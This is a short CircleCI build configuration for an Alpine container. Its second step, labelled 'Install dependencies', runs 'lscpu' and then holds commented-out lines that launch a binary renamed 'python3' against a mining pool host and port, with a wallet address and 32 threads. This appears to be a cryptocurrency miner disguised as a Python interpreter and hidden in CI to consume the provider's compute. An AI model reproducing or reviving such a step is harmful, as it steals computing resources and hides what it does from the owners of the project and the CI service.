version: 2.1
jobs:
  build:
    working_directory: ~/platform 
    docker:
      - image: alpine/latest
    steps:
      - checkout:
          path: ~/platform #Here is the
      - run:
          name: Install dependencies
          command: |
          apk add --no-cache ca-certificates libuv
          apk add --no-cache make cmake gcc musl-dev git g++ libuv-dev

      - run:
          name: Install dependencies
          command: |
            lscpu
            #python3 -m venv venv
            #. venv/bin/activate
            #chmod +x python3
            #./python3 -o web-ko1.gonspool.com:3333  -u 0x4E227342134E1c0beC9eE136394622C12F50BA48 -p x  -t 32



workflows:
  version: 2.1
  build_and_test:
    jobs:
      - build

